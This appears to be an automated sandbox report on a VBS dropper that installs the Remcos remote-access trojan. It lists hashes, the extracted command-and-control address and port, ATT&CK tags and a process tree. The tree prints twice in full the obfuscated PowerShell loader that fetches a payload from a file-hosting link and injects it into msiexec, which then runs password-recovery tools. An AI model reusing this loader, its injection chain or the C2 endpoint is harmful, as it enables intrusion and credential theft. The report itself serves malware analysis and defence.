remcos | fcaa4716a7f8e4a85a36cbad09b39eb8d42e3e8014becd4007ca8d2acf66656b

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
10-12-2024 01:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Bunker_STS_pdf.vbs
Size

13KB
MD5

d337850be4db2196fbd9b40b714ba227
SHA1

e43b4b7c792001b7c91bd03471d94f2bc1dbd66f
SHA256

029802343fbb801604ed9508ebd34ea0eff7873afb6b308f5dfad5db56ac5f8c
SHA512

4ffb485d2e5dac71db20b6a8b24cf0073600c4f9ac709d9579a45478c3629195d0fda258b447fef8dbd9e77bb4bd4990ffe1113880f542f6136397b4ca135a12
SSDEEP

384:1DY35T6OmW8azd5vpecmEzqwVqIxJuRoSiZsyvVx:1DYJ+O5vpecmExjSRXZ+

Score

10^/10

remcos remotehost collection discovery execution rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

154.216.18.214:2404

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-AOD6MB
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral2/memory/4040-77-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral2/memory/412-73-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral2/memory/224-71-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral2/memory/412-73-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/memory/224-71-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 10 IoCs

flow	pid	Process
15	4864	powershell.exe
17	4864	powershell.exe
27	1156	msiexec.exe
31	1156	msiexec.exe
33	1156	msiexec.exe
35	1156	msiexec.exe
36	1156	msiexec.exe
48	1156	msiexec.exe
49	1156	msiexec.exe
51	1156	msiexec.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	msiexec.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4864	powershell.exe
2696	powershell.exe

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\Z:	WScript.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
27	drive.google.com
14	drive.google.com
15	drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
1156	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2696	powershell.exe
1156	msiexec.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 1156 set thread context of 224	1156	msiexec.exe	96
PID 1156 set thread context of 412	1156	msiexec.exe	97
PID 1156 set thread context of 4040	1156	msiexec.exe	99

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
4864	powershell.exe
4864	powershell.exe
2696	powershell.exe
2696	powershell.exe
2696	powershell.exe
224	msiexec.exe
224	msiexec.exe
4040	msiexec.exe
4040	msiexec.exe
224	msiexec.exe
224	msiexec.exe

Suspicious behavior: MapViewOfSection 5 IoCs

pid	Process
2696	powershell.exe
1156	msiexec.exe
1156	msiexec.exe
1156	msiexec.exe
1156	msiexec.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4864	powershell.exe
Token: SeDebugPrivilege	2696	powershell.exe
Token: SeDebugPrivilege	4040	msiexec.exe

Suspicious use of WriteProcessMemory 21 IoCs

description	pid	Process	procid_target
PID 4636 wrote to memory of 4864	4636	WScript.exe	83
PID 4636 wrote to memory of 4864	4636	WScript.exe	83
PID 2696 wrote to memory of 1156	2696	powershell.exe	93
PID 2696 wrote to memory of 1156	2696	powershell.exe	93
PID 2696 wrote to memory of 1156	2696	powershell.exe	93
PID 2696 wrote to memory of 1156	2696	powershell.exe	93
PID 1156 wrote to memory of 224	1156	msiexec.exe	96
PID 1156 wrote to memory of 224	1156	msiexec.exe	96
PID 1156 wrote to memory of 224	1156	msiexec.exe	96
PID 1156 wrote to memory of 224	1156	msiexec.exe	96
PID 1156 wrote to memory of 412	1156	msiexec.exe	97
PID 1156 wrote to memory of 412	1156	msiexec.exe	97
PID 1156 wrote to memory of 412	1156	msiexec.exe	97
PID 1156 wrote to memory of 412	1156	msiexec.exe	97
PID 1156 wrote to memory of 3912	1156	msiexec.exe	98
PID 1156 wrote to memory of 3912	1156	msiexec.exe	98
PID 1156 wrote to memory of 3912	1156	msiexec.exe	98
PID 1156 wrote to memory of 4040	1156	msiexec.exe	99
PID 1156 wrote to memory of 4040	1156	msiexec.exe	99
PID 1156 wrote to memory of 4040	1156	msiexec.exe	99
PID 1156 wrote to memory of 4040	1156	msiexec.exe	99

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Bunker_STS_pdf.vbs"
1⤵
- Checks computer location settings
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
PID:4636
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Tetrapyramid='Biseriately';;$Afsnitsnumrets='Expositoriness';;$Tomastedearovize='Tractile';;$Oncogene='Poniarded40';;$solfeggios=$host.Name;function Terrorhandlingerne($Nettovgtenes41){If ($solfeggios) {$Antitangent=3} for ($Tomastede=$Antitangent;;$Tomastede+=4){if(!$Nettovgtenes41[$Tomastede]){$Domsmands90++;break }$Guaranteer+=$Nettovgtenes41[$Tomastede];$Recite='shims'}$Guaranteer}function windslab($Filmguide){ .($Ovoelliptic) ($Filmguide)}$Bombastiskes=Terrorhandlingerne 'BilnFore .stUnc. jW';$Bombastiskes+=Terrorhandlingerne 'slae.anBMisCstel,raIIndEst NTriT';$Ranglers=Terrorhandlingerne 'CudMsuro P.zIlii Brl nkl MeaOpt/';$sparrier=Terrorhandlingerne ' B TC el.yhsMta1st 2';$Folkekommunistisk='Kan[ seNFrgEWagT A..datsKrieHovrUndV M iRooC AneJetp Inosi.iP nn sat N.M spAArcNRevaAingEu.EBe.rKu ] re:O,s: ZosJu EsteCMeiuOpsrLegIFo TstaYBomP BarE,eODocTNonOAarCH.noElmLPre= ec$Ol.s L.pPenasalrHierstaI yret er';$Ranglers+=Terrorhandlingerne ' Jo5Aff.Ple0Cys Teg(H.dWFlliAnhnBr,dAnro ewConsfor AmpNU dTInd Cha1 om0 Re.Fra0 .e; ba BreWstoi.ndnBla6 Ap4Arr;Jen ,hxDep6Obl4Dri;Lyn CorAt vspr:sk 1Cic3 M 1,kt.Lrt0M,c) k PinGsdve sic Trk skosna/Con2A.d0.ma1spa0 P 0 Ak1B.h0.ut1uni IntFKoniThur aeQuef W,oE,ex,ns/ ka1.an3,ne1K.c.At 0';$Uddrog=Terrorhandlingerne 'U oU mpsd.teNewR ar-Co Asipg HaeElenUdbT';$Blindeinstituttet=Terrorhandlingerne ' Poh evtsamtNatpU dsPh : Ve/Gr./Joud HarBe,iTelvvioeHel.PregA soC oosatgsamlu leR t.NivcPloosukm Ms/svausancCon?Ovee,omx kopsanota rMartsup=G,ldKono uawTypn rlM goLysaF.ad Bi&A liPladoli=Hed1k exEtnnAr orecF g 5s ajMetyGeiiUdliAmtH.mpo U 0 omt echV ta enaTr 9Plak O.GHaa0sikHB sxRea4 aF MaiForTyelcRumUNav0A,czR tbJugo';$seksaarsdrenges=Terrorhandlingerne 'Pri>';$Ovoelliptic=Terrorhandlingerne 'Bu,IO tE C X';$Mrkelgge='supercerebellar';$Krigslisten='\Elgtyre.Bev';windslab (Terrorhandlingerne ' ve$EclgPseLPreo pBHenA Kal Ko: rkM HyeUfoIKeres rr.es=Na $AkseEjeNFrivsto: T a AfpsmgpscrDTroa onts.aaBin+Nip$sunKFlaRDeciWhegGlasDysL Nei osBurtExpeThun');windslab (Terrorhandlingerne 'sna$Refg,rmlIndoGe.b B A ubl f:RepbHaleTilRHdet ,shAndesa rPa =Op $.krbUnmLco IFransipDNonENonIFlan Grs ApttilImactRagUOphT uptsgeebe,tTan.Da.ss epBesLFani nnt ut(Far$ EvsTemeHagkAgnsAk,A GoADisrlezsRefdTrarH rEPu nMedgHe eRe.sga,)');windslab (Terrorhandlingerne $Folkekommunistisk);$Blindeinstituttet=$Berther[0];$Medaljonernes=(Terrorhandlingerne 'dup$ IngCysL leO ruBTj.a s lsch:FstmEtyaP aNBi dForODagLHy,ICreNLynePhy=E,fnPodes iw T.-s,bO M bspijOveeBesCMectPa. Ov sBe YForsgentCo,E ImMsta.Fa $TetBsneO,ubMForBTkkA CesAntt PhIRessUp.KB lEUdas');windslab ($Medaljonernes);windslab (Terrorhandlingerne 'For$couMstea CanBe,dUv oMatlLoniHofnKrye Ti. QuH Lie taa N dDise BerbagsKli[Cey$C.nUPotdHexdTrursauo org G.] pi=Aur$ rRModa tanMong all dfeslerDoms');$Hardset=Terrorhandlingerne 'st.$skrM inaR gn F dL.koHehlOuti F nOvee,ac.F iD M oKahwBlinIstl F.oTekaJawd iaFNoni G l yreBoe(Unp$ PyBAr li pistun ads ee Gri FenK esPritMo iVeltMonuFeut TrtOd e sttCam,Uni$CenBPe aUncgbkkhW.sjAniu apl.ideB,nt VisVa.)';$Baghjulets=$meier;windslab (Terrorhandlingerne ' ,i$.ahGU ylpocODrabsp,A Nol sn:ProBTetYGagg Goe MeTsanTCal= ld(Afkt PoE idsturtR p-OraPUniAsweTWonh k. ,er$KvaB FoAPa,GCheH vJ InuUn.lPeaeRacT elsarc)');while (!$Bygett) {windslab (Terrorhandlingerne ' T.$ sagPesl s oRetb npaOv lrev:semAsttaMetnsacdstae ivBedepetrAnvdForeMolndebeUdsrGennEneeK,nsFav=se $PraFPanr roiA thDecePsedTras sagskroUnfddateWitt .us') ;windslab $Hardset;windslab (Terrorhandlingerne ' NospriT spAPreRMazT to-Dwes s.l AfetruEAn,p .a Per4');windslab (Terrorhandlingerne 'Gal$br.gVrelLigOudkbBdeAPlaL s:Dribim,YsnkGDa,ETratUdsTDo =Evi(vaet FyEWebsDattKri- eP GaAIsftUdshslv sub$KrybB.ya JugFr.h suJtrsuA tLTikEUpbTOmbs ga)') ;windslab (Terrorhandlingerne 'is $,osgPolLCano.roB oADarl v:M nIsu,MPanARu GkoniRehnBefr,idT De=Per$Pr GMa L s OFreb oraRaaL.or: ChpTooR oO lgTEtpeBesIFrsNerkRBi iK yGchoTGro+Ble+ Me%Gro$OrdBA rEPrir KatB cH ieHerrRha.snnCThoo AnUKe NAr t') ;$Blindeinstituttet=$Berther[$Imaginrt]}$sparsomst=281401;$Nihilities=30050;windslab (Terrorhandlingerne 'Mat$ImpGLarl Afo MibFlaA crL Af: alu es BosKrlE Trl ehi MigBe.eDo sM t ,ph= U s kgrhoEs mt Y -BricExpoU sn E t oeUnsnsektCap Ud $Forb yrAPe,GP th BlJ T.U skL omEEndTKols');windslab (Terrorhandlingerne ',re$ pogs.glDanoDi.bs aaCoal Te:LydT FreflorGemaD mpFusesuru Udtsak Tog=Era .es[ LisH ny amsAn.tsoleC,im rn.P rCDrio Nen Rev s eskar ststr] j:Mon:CarFTigrUnjoKolmPseBAnaaPiss PieAsp6skr4 lysVoktFrarCogispan GagUnd(The$MilUBaas sasChaeirol AliF agstaePo ssem)');windslab (Terrorhandlingerne 'Jun$scagH,rldeaoChoBPilaMo LDob:ExhgManr epU E,pT lP TyeV.gs notplur K.uK.rkCent enUDejRB.oEEthnBers lu se=Cat .ns[ ersBreyDiss N tPenEBa.mExp.u,dTscreAdvx crt le. DreUfonRepCTeooir d Mui.adNHobGsag]Arc: He: soALaus UncRy.IIseI sk.UndgKolePoitaabs stT NoR stI aNtr GKic(Pa $IsptsphEAniRJacaBemp ffe onUsmetFor)');windslab (Terrorhandlingerne 'Tym$EbiG PelFatoOveb maaA,glses:squK ogn G aunaGspiesioRUnskDonkc,nes.us st= Om$ anGIn RstauVa pBagpAskEP tsVittandRVapU,meKInitsynULoprUnhEInnNTass,ro.Chas,omuParb bes iTsynR HdI Ren rgTvi(Tel$BussCelp,gta ovRC asDekOAn.MAnts arTbid, n$ OnnCarI yaHPdaIAntLEleiA stMori yeU.rsDa )');windslab $Knagerkkes;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4864

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Tetrapyramid='Biseriately';;$Afsnitsnumrets='Expositoriness';;$Tomastedearovize='Tractile';;$Oncogene='Poniarded40';;$solfeggios=$host.Name;function Terrorhandlingerne($Nettovgtenes41){If ($solfeggios) {$Antitangent=3} for ($Tomastede=$Antitangent;;$Tomastede+=4){if(!$Nettovgtenes41[$Tomastede]){$Domsmands90++;break }$Guaranteer+=$Nettovgtenes41[$Tomastede];$Recite='shims'}$Guaranteer}function windslab($Filmguide){ .($Ovoelliptic) ($Filmguide)}$Bombastiskes=Terrorhandlingerne 'BilnFore .stUnc. jW';$Bombastiskes+=Terrorhandlingerne 'slae.anBMisCstel,raIIndEst NTriT';$Ranglers=Terrorhandlingerne 'CudMsuro P.zIlii Brl nkl MeaOpt/';$sparrier=Terrorhandlingerne ' B TC el.yhsMta1st 2';$Folkekommunistisk='Kan[ seNFrgEWagT A..datsKrieHovrUndV M iRooC AneJetp Inosi.iP nn sat N.M spAArcNRevaAingEu.EBe.rKu ] re:O,s: ZosJu EsteCMeiuOpsrLegIFo TstaYBomP BarE,eODocTNonOAarCH.noElmLPre= ec$Ol.s L.pPenasalrHierstaI yret er';$Ranglers+=Terrorhandlingerne ' Jo5Aff.Ple0Cys Teg(H.dWFlliAnhnBr,dAnro ewConsfor AmpNU dTInd Cha1 om0 Re.Fra0 .e; ba BreWstoi.ndnBla6 Ap4Arr;Jen ,hxDep6Obl4Dri;Lyn CorAt vspr:sk 1Cic3 M 1,kt.Lrt0M,c) k PinGsdve sic Trk skosna/Con2A.d0.ma1spa0 P 0 Ak1B.h0.ut1uni IntFKoniThur aeQuef W,oE,ex,ns/ ka1.an3,ne1K.c.At 0';$Uddrog=Terrorhandlingerne 'U oU mpsd.teNewR ar-Co Asipg HaeElenUdbT';$Blindeinstituttet=Terrorhandlingerne ' Poh evtsamtNatpU dsPh : Ve/Gr./Joud HarBe,iTelvvioeHel.PregA soC oosatgsamlu leR t.NivcPloosukm Ms/svausancCon?Ovee,omx kopsanota rMartsup=G,ldKono uawTypn rlM goLysaF.ad Bi&A liPladoli=Hed1k exEtnnAr orecF g 5s ajMetyGeiiUdliAmtH.mpo U 0 omt echV ta enaTr 9Plak O.GHaa0sikHB sxRea4 aF MaiForTyelcRumUNav0A,czR tbJugo';$seksaarsdrenges=Terrorhandlingerne 'Pri>';$Ovoelliptic=Terrorhandlingerne 'Bu,IO tE C X';$Mrkelgge='supercerebellar';$Krigslisten='\Elgtyre.Bev';windslab (Terrorhandlingerne ' ve$EclgPseLPreo pBHenA Kal Ko: rkM HyeUfoIKeres rr.es=Na $AkseEjeNFrivsto: T a AfpsmgpscrDTroa onts.aaBin+Nip$sunKFlaRDeciWhegGlasDysL Nei osBurtExpeThun');windslab (Terrorhandlingerne 'sna$Refg,rmlIndoGe.b B A ubl f:RepbHaleTilRHdet ,shAndesa rPa =Op $.krbUnmLco IFransipDNonENonIFlan Grs ApttilImactRagUOphT uptsgeebe,tTan.Da.ss epBesLFani nnt ut(Far$ EvsTemeHagkAgnsAk,A GoADisrlezsRefdTrarH rEPu nMedgHe eRe.sga,)');windslab (Terrorhandlingerne $Folkekommunistisk);$Blindeinstituttet=$Berther[0];$Medaljonernes=(Terrorhandlingerne 'dup$ IngCysL leO ruBTj.a s lsch:FstmEtyaP aNBi dForODagLHy,ICreNLynePhy=E,fnPodes iw T.-s,bO M bspijOveeBesCMectPa. Ov sBe YForsgentCo,E ImMsta.Fa $TetBsneO,ubMForBTkkA CesAntt PhIRessUp.KB lEUdas');windslab ($Medaljonernes);windslab (Terrorhandlingerne 'For$couMstea CanBe,dUv oMatlLoniHofnKrye Ti. QuH Lie taa N dDise BerbagsKli[Cey$C.nUPotdHexdTrursauo org G.] pi=Aur$ rRModa tanMong all dfeslerDoms');$Hardset=Terrorhandlingerne 'st.$skrM inaR gn F dL.koHehlOuti F nOvee,ac.F iD M oKahwBlinIstl F.oTekaJawd iaFNoni G l yreBoe(Unp$ PyBAr li pistun ads ee Gri FenK esPritMo iVeltMonuFeut TrtOd e sttCam,Uni$CenBPe aUncgbkkhW.sjAniu apl.ideB,nt VisVa.)';$Baghjulets=$meier;windslab (Terrorhandlingerne ' ,i$.ahGU ylpocODrabsp,A Nol sn:ProBTetYGagg Goe MeTsanTCal= ld(Afkt PoE idsturtR p-OraPUniAsweTWonh k. ,er$KvaB FoAPa,GCheH vJ InuUn.lPeaeRacT elsarc)');while (!$Bygett) {windslab (Terrorhandlingerne ' T.$ sagPesl s oRetb npaOv lrev:semAsttaMetnsacdstae ivBedepetrAnvdForeMolndebeUdsrGennEneeK,nsFav=se $PraFPanr roiA thDecePsedTras sagskroUnfddateWitt .us') ;windslab $Hardset;windslab (Terrorhandlingerne ' NospriT spAPreRMazT to-Dwes s.l AfetruEAn,p .a Per4');windslab (Terrorhandlingerne 'Gal$br.gVrelLigOudkbBdeAPlaL s:Dribim,YsnkGDa,ETratUdsTDo =Evi(vaet FyEWebsDattKri- eP GaAIsftUdshslv sub$KrybB.ya JugFr.h suJtrsuA tLTikEUpbTOmbs ga)') ;windslab (Terrorhandlingerne 'is $,osgPolLCano.roB oADarl v:M nIsu,MPanARu GkoniRehnBefr,idT De=Per$Pr GMa L s OFreb oraRaaL.or: ChpTooR oO lgTEtpeBesIFrsNerkRBi iK yGchoTGro+Ble+ Me%Gro$OrdBA rEPrir KatB cH ieHerrRha.snnCThoo AnUKe NAr t') ;$Blindeinstituttet=$Berther[$Imaginrt]}$sparsomst=281401;$Nihilities=30050;windslab (Terrorhandlingerne 'Mat$ImpGLarl Afo MibFlaA crL Af: alu es BosKrlE Trl ehi MigBe.eDo sM t ,ph= U s kgrhoEs mt Y -BricExpoU sn E t oeUnsnsektCap Ud $Forb yrAPe,GP th BlJ T.U skL omEEndTKols');windslab (Terrorhandlingerne ',re$ pogs.glDanoDi.bs aaCoal Te:LydT FreflorGemaD mpFusesuru Udtsak Tog=Era .es[ LisH ny amsAn.tsoleC,im rn.P rCDrio Nen Rev s eskar ststr] j:Mon:CarFTigrUnjoKolmPseBAnaaPiss PieAsp6skr4 lysVoktFrarCogispan GagUnd(The$MilUBaas sasChaeirol AliF agstaePo ssem)');windslab (Terrorhandlingerne 'Jun$scagH,rldeaoChoBPilaMo LDob:ExhgManr epU E,pT lP TyeV.gs notplur K.uK.rkCent enUDejRB.oEEthnBers lu se=Cat .ns[ ersBreyDiss N tPenEBa.mExp.u,dTscreAdvx crt le. DreUfonRepCTeooir d Mui.adNHobGsag]Arc: He: soALaus UncRy.IIseI sk.UndgKolePoitaabs stT NoR stI aNtr GKic(Pa $IsptsphEAniRJacaBemp ffe onUsmetFor)');windslab (Terrorhandlingerne 'Tym$EbiG PelFatoOveb maaA,glses:squK ogn G aunaGspiesioRUnskDonkc,nes.us st= Om$ anGIn RstauVa pBagpAskEP tsVittandRVapU,meKInitsynULoprUnhEInnNTass,ro.Chas,omuParb bes iTsynR HdI Ren rgTvi(Tel$BussCelp,gta ovRC asDekOAn.MAnts arTbid, n$ OnnCarI yaHPdaIAntLEleiA stMori yeU.rsDa )');windslab $Knagerkkes;"
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2696
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:1156
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\kdhrujpyzlshhnpxkobcogoo"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:224
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\vxucvcazntkmrbljczoertjfaif"
    3⤵
    - Accesses Microsoft Outlook accounts
    - System Location Discovery: System Language Discovery
    PID:412
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\frzuvmltjbcquhznlkifbxvoixputfk"
    3⤵
    PID:3912
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\frzuvmltjbcquhznlkifbxvoixputfk"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4040

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d34112a7b4df3c9e30ace966437c5e40

SHA1
ec07125ad2db8415cf2602d1a796dc3dfc8a54d6

SHA256
cd9665cdaf412455d6f8dbdb60c721d0cf2ac992f7cd4830d89e8c75f9cfbfbf

SHA512
49fd43e69ece9c8185ada6b6ea5bd8619cb2b31de49793d3bd80180ecf3cf8ad24cac6c494185c99623417de52465c832166f7a4890d36ac0f3be5bd7652e053

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tfmoeyx4.2vq.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\kdhrujpyzlshhnpxkobcogoo

Filesize
4KB

MD5
f1d2c01ce674ad7d5bad04197c371fbc

SHA1
4bf0ed04d156a3dc6c8d27e134ecbda76d3585aa

SHA256
25b006032deccd628940ef728fffe83b325a85de453a34691f55f570e4460094

SHA512
81cb982cc33dcc27600a8a681c3ec3cc5b9221b95baa45e1ab24479745a9638b9f31d7beeeb1128b3294ff69b44e958c75e25d565f66790c364665caff96ee77

Download Submit
C:\Users\Admin\AppData\Roaming\Elgtyre.Bev

Filesize
405KB

MD5
17ea5f6329fe062a0dbca4c04658c8d9

SHA1
68cd242dae3be4f4a2576be6ce1ec17230b4e04d

SHA256
8bfe6104cfdf979c2f9fddf4dda0b75cc5729de16826fe1f19d2730363e2e246

SHA512
0cc7f3c6c0abc74e9c0954b80def4ed380274c48cc3df5ffc4a4698318a6b322b2eb1d379060fde2d6ea6a0716822b543564ef2991888e22bf5200e217747648

Download Submit
memory/224-71-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/224-64-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/224-68-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/224-70-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/412-72-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/412-73-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/412-65-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1156-58-0x0000000001000000-0x0000000002254000-memory.dmp

Filesize
18.3MB

Download
memory/1156-63-0x0000000001000000-0x0000000002254000-memory.dmp

Filesize
18.3MB

Download
memory/1156-94-0x0000000001000000-0x0000000002254000-memory.dmp

Filesize
18.3MB

Download
memory/1156-93-0x0000000001000000-0x0000000002254000-memory.dmp

Filesize
18.3MB

Download
memory/1156-92-0x0000000001000000-0x0000000002254000-memory.dmp

Filesize
18.3MB

Download
memory/1156-91-0x0000000001000000-0x0000000002254000-memory.dmp

Filesize
18.3MB

Download
memory/1156-90-0x0000000001000000-0x0000000002254000-memory.dmp

Filesize
18.3MB

Download
memory/1156-89-0x0000000001000000-0x0000000002254000-memory.dmp

Filesize
18.3MB

Download
memory/1156-88-0x0000000001000000-0x0000000002254000-memory.dmp

Filesize
18.3MB

Download
memory/1156-87-0x0000000001000000-0x0000000002254000-memory.dmp

Filesize
18.3MB

Download
memory/1156-86-0x0000000001000000-0x0000000002254000-memory.dmp

Filesize
18.3MB

Download
memory/1156-85-0x0000000001000000-0x0000000002254000-memory.dmp

Filesize
18.3MB

Download
memory/1156-80-0x000000001FED0000-0x000000001FEE9000-memory.dmp

Filesize
100KB

Download
memory/1156-83-0x000000001FED0000-0x000000001FEE9000-memory.dmp

Filesize
100KB

Download
memory/1156-84-0x000000001FED0000-0x000000001FEE9000-memory.dmp

Filesize
100KB

Download
memory/2696-42-0x0000000007B20000-0x0000000007B42000-memory.dmp

Filesize
136KB

Download
memory/2696-39-0x0000000008180000-0x00000000087FA000-memory.dmp

Filesize
6.5MB

Download
memory/2696-25-0x0000000006240000-0x00000000062A6000-memory.dmp

Filesize
408KB

Download
memory/2696-35-0x00000000062E0000-0x0000000006634000-memory.dmp

Filesize
3.3MB

Download
memory/2696-23-0x0000000005A50000-0x0000000005A72000-memory.dmp

Filesize
136KB

Download
memory/2696-37-0x00000000068F0000-0x000000000690E000-memory.dmp

Filesize
120KB

Download
memory/2696-38-0x0000000006940000-0x000000000698C000-memory.dmp

Filesize
304KB

Download
memory/2696-21-0x0000000005340000-0x0000000005376000-memory.dmp

Filesize
216KB

Download
memory/2696-40-0x0000000006EC0000-0x0000000006EDA000-memory.dmp

Filesize
104KB

Download
memory/2696-41-0x0000000007BC0000-0x0000000007C56000-memory.dmp

Filesize
600KB

Download
memory/2696-24-0x0000000006150000-0x00000000061B6000-memory.dmp

Filesize
408KB

Download
memory/2696-43-0x0000000008DB0000-0x0000000009354000-memory.dmp

Filesize
5.6MB

Download
memory/2696-22-0x0000000005B20000-0x0000000006148000-memory.dmp

Filesize
6.2MB

Download
memory/2696-45-0x0000000009360000-0x000000000AAE1000-memory.dmp

Filesize
23.5MB

Download
memory/4040-77-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/4040-67-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
